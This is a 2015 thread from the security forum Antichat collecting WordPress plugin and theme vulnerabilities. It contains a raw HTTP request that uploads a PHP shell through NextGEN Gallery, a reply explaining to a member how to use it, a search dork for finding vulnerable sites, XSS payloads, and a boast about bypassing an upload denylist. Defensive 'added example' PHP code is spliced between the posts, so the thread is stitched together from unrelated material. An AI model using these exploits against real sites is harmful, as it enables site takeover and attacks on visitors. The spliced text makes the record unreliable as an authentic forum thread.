ANTICHAT: a forum on information security, OSINT and technology
ANTICHAT is a Russian-speaking community for security, OSINT and programming.
The forum previously ran on the domains antichat.ru, antichat.com and antichat.club,
and is now available again at a new address:
forum.antichat.xyz.
The forum has been restored and continues to develop: archived threads are available, and new discussions and materials are being added.
⚠️ Old accounts cannot be restored; you need to register again.
27.04.2015, 12:54
Banned | Registered: 21.11.2007 | Posts: 181 | Time on forum: 1066435 | Reputation: 1013
WordPress 4.2 stored XSS
Quote from None:
*Details*
If the comment text is long enough, it will be truncated when inserted in the database. The MySQL TEXT type size limit is 64 kilobytes so the comment has to be quite long.
The truncation results in malformed HTML generated on the page. The attacker can supply any attributes in the allowed HTML tags, in the same way as the previous stored XSS vulnerabilities affecting WordPress.
The vulnerability bears a similarity to the one reported by Cedric Van Bockhaven in 2014 (patched this week, after 14 months). Instead of using an invalid UTF-8 character to truncate the comment, this time an excessively long comment text is used for the same effect.
In these two cases the injected JavaScript apparently can't be triggered in the administrative Dashboard, so these exploits require getting around comment moderation e.g. by posting one harmless comment first.
*Proof of Concept*
Enter the following as a comment:
This was tested on WordPress 4.2, 4.1.2, and 4.1.1, MySQL versions 5.1.53 and 5.5.41.
*Solution*
Disable comments (Dashboard, Settings/Discussion, select as restrictive options as possible). Do not approve any comments.
*Credits*
The vulnerability was discovered by Jouko Pynnönen of Klikki Oy.
An up-to-date version of this document:
http://klikki.fi/adv/wordpress2.html
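Two defensive checks that follow from the advisory's description, as an added example that is not from Klikki's advisory or from WordPress core: a byte-length guard applied before the insert, so an over-long comment is rejected instead of being silently cut at the 64 KB TEXT limit, and an audit helper that flags stored comments sitting exactly at that limit, which is what a truncated insert looks like afterwards. The constant, the function names and the row shape are assumptions.

```php
<?php
// Added example, not WordPress core code. Guard comment length in bytes before
// the INSERT so MySQL never gets the chance to truncate a TEXT column.
// TEXT holds at most 65,535 bytes; the limit is bytes, not characters, so
// multibyte UTF-8 text reaches it sooner than mb_strlen() would suggest.
const MYSQL_TEXT_MAX_BYTES = 65535;

function comment_fits_text_column(string $comment): bool
{
    // strlen() counts bytes, which matches how the column limit is measured.
    return strlen($comment) <= MYSQL_TEXT_MAX_BYTES;
}

// Audit helper for already-stored data: a stored value whose byte length is
// exactly the column limit is the signature of an insert that was cut off.
// Assumed row shape: ['comment_ID' => int, 'comment_content' => string].
function find_possibly_truncated(array $rows): array
{
    $suspects = [];
    foreach ($rows as $row) {
        if (strlen($row['comment_content']) === MYSQL_TEXT_MAX_BYTES) {
            $suspects[] = $row['comment_ID'];
        }
    }
    return $suspects;
}

// Constructed sample data for a stand-alone run.
$short = str_repeat('a', 100);
$huge  = str_repeat('a', MYSQL_TEXT_MAX_BYTES + 1);
var_dump(comment_fits_text_column($short));
var_dump(comment_fits_text_column($huge));

$rows = [
    ['comment_ID' => 1, 'comment_content' => $short],
    ['comment_ID' => 2, 'comment_content' => str_repeat('b', MYSQL_TEXT_MAX_BYTES)],
];
print_r(find_possibly_truncated($rows));
```

Running MySQL with a strict SQL mode (STRICT_TRANS_TABLES or STRICT_ALL_TABLES) turns an over-long insert into an error instead of a silent truncation; the length check above is the application-side equivalent and gives the commenter a clear rejection. Neither replaces filtering on output: stored HTML should be sanitized again at render time, so that a value damaged in storage cannot reach the page as a half-open tag.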
29.04.2015, 16:31
Forum member | Registered: 31.03.2008 | Posts: 143 | Time on forum: 403124 | Reputation: 95
WordPress NextGEN Gallery 2.0.63 Shell Upload Vulnerability
Code:
WordPress NextGEN Gallery plugin version 2.0.63 suffers from a remote shell upload vulnerability.
# Exploit Title: Wordpress NextGEN Gallery Plugin 2.0.63 Arbitrary File Upload
# Author: SANTHO ( @s4n7h0 )
# Vendor Homepage: http://wordpress.org/plugins/nextgen-gallery/
# Category: WebApp / CMS / Wordpress
# Version: 2.0.63 and less
---------------------------------------------------
Vulnerability Tracking
======================
Reported to vendor : Fri, May 9, 2014 at 9:20 PM
Vendor Acknowledgement : Sat, May 10, 2014 at 2:36 AM
Vendor Informed about patch release (version 2.65) : Mon, May 19, 2014 at 7:54 PM
Vulnerability Details
=======================
POST /index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name= HTTP/1.1
Host: target_ip
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[target_ip]/wp-admin/admin.php?page=ngg_addgallery
Content-Length: 630
Content-Type: multipart/form-data; boundary=---------------------------2427186578189
Cookie: X-Frame-Events_290365e482ebdeeed313858b8a3de791=%7B%22event%22%3A%22new_gallery%22%2C%22gallery_id%22%3A1%2C%22gallery_title%22%3A%22folder_name%22%2C%22context%22%3A%22attach_to_post%22%7D; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_57cce18206a53fed21932c6dc2920f94=admin%7C1399203127%7C70f668b775581773d1500b1b8162de42; wp-settings-time-1=1399030444
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------2427186578189
Content-Disposition: form-data; name="name"
cmd.php.jpg
-----------------------------2427186578189
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg
The Shell can be accessible at following URL
http://[target-ip]/wp-content/gallery/folder_name/cmd.php
# 1337day.com #
Could someone please tell me how to use this thing?
29.04.2015, 16:37
Banned | Registered: 21.11.2007 | Posts: 181 | Time on forum: 1066435 | Reputation: 1013
Quote from ICQ Hool:
↑ WordPress NextGEN Gallery 2.0.63 Shell Upload Vulnerability
[...]
Could someone please tell me how to use this thing?
You need to send a POST request and, when sending, swap the extension from jpg to php;
the shell will be at /wp-content/gallery/folder_name/shell.php
29.04.2015, 19:54
Newbie | Registered: 08.04.2010 | Posts: 1 | Time on forum: 70640 | Reputation: 0
Quote from winstrool:
↑ MAC PHOTO GALLERY v. 2.7
MAC PHOTO GALLERY
dork: inurl:plugins/mac-dock-gallery/ download
@version:2.7
Vulnerable code:
PHP code:
$file = dirname(dirname(dirname(__FILE__))) . "/uploads/mac-dock-gallery/" . $_GET['albid'];
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename=' . basename($file));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header('Content-Length: ' . filesize($file));
ob_clean();
flush();
readfile($file);
POC:
PATCH:
https://wordpress.org/plugins/mac-do...y/other_notes/
And there's XSS in the same place
Code:
http://crytotheblind.com/site/wp-content/plugins/mac-dock-gallery/mac_imageview.php?mac_albid=1">&limit=42
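The download code quoted in the post appends `$_GET['albid']` straight onto the uploads path. A confined version, as an added example that is not taken from the plugin, resolves the requested name inside the gallery directory and refuses anything that ends up outside it or is not a regular file; the function names and the directory argument are assumptions.

```php
<?php
// Added example, not the plugin's code. Resolve a requested gallery file inside
// the upload directory and refuse anything that escapes it.

function resolve_gallery_file(string $upload_dir, string $requested): ?string
{
    // 1. Keep only the final path component: no directory separators, no "..".
    $name = basename(str_replace("\0", '', $requested));
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }
    // 2. Canonicalise both the base directory and the candidate path
    //    (realpath() follows symlinks, so a link pointing outside resolves outside).
    $base = realpath($upload_dir);
    $path = realpath($upload_dir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null; // directory missing or file does not exist
    }
    // 3. The canonical path must lie strictly inside the base directory.
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    // 4. Serve regular files only.
    return is_file($path) ? $path : null;
}

function send_gallery_file(string $upload_dir, string $requested): void
{
    $path = resolve_gallery_file($upload_dir, $requested);
    if ($path === null) {
        http_response_code(404);
        exit('not found');
    }
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    // Quote and encode the name so it cannot carry header-breaking characters.
    header('Content-Disposition: attachment; filename="' . rawurlencode(basename($path)) . '"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
    exit;
}
// In the request handler this would be called as:
//   send_gallery_file($upload_dir, $_GET['albid'] ?? '');

// Constructed self-check in a throwaway directory (no web server needed).
$dir = sys_get_temp_dir() . '/gallery-demo-' . getmypid();
mkdir($dir);
file_put_contents($dir . '/album1.zip', 'demo');
var_dump(resolve_gallery_file($dir, 'album1.zip') !== null);
var_dump(resolve_gallery_file($dir, '../outside.txt') === null);
var_dump(resolve_gallery_file($dir, 'missing.zip') === null);
unlink($dir . '/album1.zip');
rmdir($dir);
```

Better still is not to accept a file name from the client at all: look the album up by an opaque ID in the database and derive the file name server-side, so the request parameter never touches the file system.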
13.05.2015, 19:28
Guest | Posts: n/a | Time on forum: 193811 | Reputation: 724
Wordpress Twenty Fifteen Theme - DOM XSS Vulnerability - CVE-2015-3429
Affected Versions: 4.2.1 and probably below
Proof of Concept URL for DOM XSS in WordPress:
Code:
http://example.com/wp-content/themes/twentyfifteen/genericons/example.html#
Source: http://seclists.org/bugtraq/2015/May/56
13.05.2015, 20:08
Newbie | Registered: 04.12.2008 | Posts: 11 | Time on forum: 69033 | Reputation: 8
Quote from VY_CMa:
↑ Wordpress Twenty Fifteen Theme - DOM XSS Vulnerability - CVE-2015-3429
Affected Versions: 4.2.1 and probably below
Proof of Concept URL for DOM XSS in WordPress:
Code:
http://example.com/wp-content/themes/twentyfifteen/genericons/example.html#
Source: http://seclists.org/bugtraq/2015/May/56
Or this vector for Chrome:
Code:
http://example.com/wp-content/themes/twentyfifteen/genericons/example.html#1
22.05.2015, 20:54
Forum member | Registered: 31.03.2008 | Posts: 160 | Time on forum: 706093 | Reputation: 97
Quote from faza02:
↑ You need to send a POST request and, when sending, swap the extension from jpg to php;
the shell will be at /wp-content/gallery/folder_name/shell.php
But doesn't that require admin rights?
05.06.2015, 00:38
Learner | Registered: 06.03.2007 | Posts: 59 | Time on forum: 371875 | Reputation: 137
This bug was published publicly:
https://www.exploit-db.com/exploits/37166/ - WordPress dzs-zoomsounds Plugins
PHP code:
        die('invalid extension - disallowed_filetypeshideFeedbacksCall()');
    }
    if (!is_writable($upload_dir)) {
        die('dir not writable - check permissionshideFeedbacksCall()');
    }
    if (copy($_FILES['file_field']['tmp_name'], $path)) {
        echo 'file uploadedtop.hideFeedbacksCall();';
    } else {
        echo 'file could not be uploadedwindow.hideFeedbacksCall()';
    }
} else {
    $headers = get_theheaders();
    if (isset($headers['HTTP_X_FILE_NAME'])) {
        //print_r($headers);
        $file_name = $headers['HTTP_X_FILE_NAME'];
        $file_name = str_replace(" ", "_", $file_name); // strip spaces
        $target = $upload_dir . "/" . $file_name;
        //==== checking for disallowed file types
        $sw = false;
        foreach ($disallowed_filetypes as $dft) {
            $pos = strpos($file_name, $dft);
            if ($pos !== false) {
                $sw = true;
            }
        }
        if ($sw == true) {
            die('invalid extension - disallowed_filetypes');
        }
        if (!is_writable($upload_dir)) {
            die('dir not writable - check permissions');
        }
        //echo $target;
        $content = file_get_contents("php://input");
        if (file_put_contents($target, $content)) {
            echo 'success';
        } else {
            die('error at file_put_contents');
        }
    } else {
        die('not for direct access');
    }
}
The most complete line with the set of extensions I came across was this one:
$disallowed_filetypes = array('.php', '.exe', '.shtml', '.html', '.htm','.phtml','.php5', '.php4', '.pl', '.py', '.rb', '.htaccess', '.asp', '.jsp', '.aspx');
but whoever understands this piece of code:
PHP code:
foreach ($disallowed_filetypes as $dft) {
    $pos = strpos($file_name, $dft);
    if ($pos !== false) {
        $sw = true;
    }
}
will understand that it is no obstacle for us ;-)
Passive XSS:
wp-content/plugins/dzs-videogallery/ajax.php?source="/>alert();
wp-content/plugins/dzs-videogallery/ajax.php?type="/>alert();
http://digitalzoomstudio.net/ - the author's blog
http://codecanyon.net/user/ZoomIt/portfolio - sales portfolio of the components
P.S.: Tags for Google)) dzs-videogallery exploit, dzs-zoomsounds exploit, dzs-calendar exploit, html5uploader exploit, php_ygallery exploit, php_mediagallery exploit, custom_rapista exploit, themes/royale/ exploit
05.06.2015, 22:34
Guest | Posts: n/a | Time on forum: 5775 | Reputation: 0
Quote from winstrool:
↑ Code:
foreach ($disallowed_filetypes as $dft) {
    $pos = strpos($file_name, $dft);
    if ($pos !== false) {
        $sw = true;
    }
}
And how is that bypassed?
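The `$disallowed_filetypes` loop quoted in the last two posts is a denylist of substrings, and the NextGEN request earlier in the thread shows the same weakness from the other side (a name field of `cmd.php.jpg` next to a part named `cmd.php`). The check below, an added example that is not taken from the dzs plugins or from NextGEN, is the shape a defender wants instead: an allowlist applied to the final extension, a stem reduced to a conservative character set, and a content sniff of the uploaded bytes. The constant, the function names and the use of PHP's fileinfo extension are assumptions.

```php
<?php
// Added example, not the plugin's code. Allowlist the FINAL extension instead
// of searching the name for denylisted substrings.
const ALLOWED_UPLOAD_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif'];

// Returns a normalised file name that is safe to store, or null if refused.
function sanitized_upload_name(string $original): ?string
{
    // Drop any directory part and NUL bytes a client may have sent.
    $name = basename(str_replace("\0", '', $original));
    // Split on the LAST dot: everything after it is the extension that matters.
    $dot = strrpos($name, '.');
    if ($dot === false || $dot === 0 || $dot === strlen($name) - 1) {
        return null; // no extension, hidden file, or trailing dot
    }
    $stem = substr($name, 0, $dot);
    $ext  = strtolower(substr($name, $dot + 1));
    if (!in_array($ext, ALLOWED_UPLOAD_EXTENSIONS, true)) {
        return null;
    }
    // Reduce the stem to a conservative character set; this also turns any
    // earlier dots into underscores, so every stored name has exactly one extension.
    $stem = (string) preg_replace('/[^A-Za-z0-9_-]/', '_', $stem);
    if ($stem === '' || strlen($stem) > 100) {
        return null;
    }
    return $stem . '.' . $ext;
}

// Second gate: the bytes must look like the image type the extension claims.
// Uses PHP's fileinfo extension (assumed to be available).
function upload_matches_extension(string $tmp_path, string $ext): bool
{
    $expected = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                 'png' => 'image/png', 'gif' => 'image/gif'];
    if (!isset($expected[$ext])) {
        return false;
    }
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    return $finfo->file($tmp_path) === $expected[$ext];
}

// Constructed checks: the names are taken from this thread, the bytes are a
// minimal GIF header written to a temporary file.
var_dump(sanitized_upload_name('photo.jpg'));
var_dump(sanitized_upload_name('Holiday Photo.JPG'));
var_dump(sanitized_upload_name('cmd.php.jpg'));
var_dump(sanitized_upload_name('notes.txt'));

$tmp = tempnam(sys_get_temp_dir(), 'upl');
file_put_contents($tmp, "GIF89a\x01\x00\x01\x00\x80\x00\x00");
var_dump(upload_matches_extension($tmp, 'gif'));
var_dump(upload_matches_extension($tmp, 'jpg'));
unlink($tmp);
```

The name check stops a script name from being stored, the content check stops a renamed script from being stored as an image, and a third layer belongs in the web server: the upload directory should be configured so that nothing in it is executed as a script, which limits the damage if either check is ever wrong. Keep the allowlist to the types the feature actually needs rather than to everything the denylist failed to name.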
05.06.2015, 22:51
Learner | Registered: 06.03.2007 | Posts: 59 | Time on forum: 371875 | Reputation: 137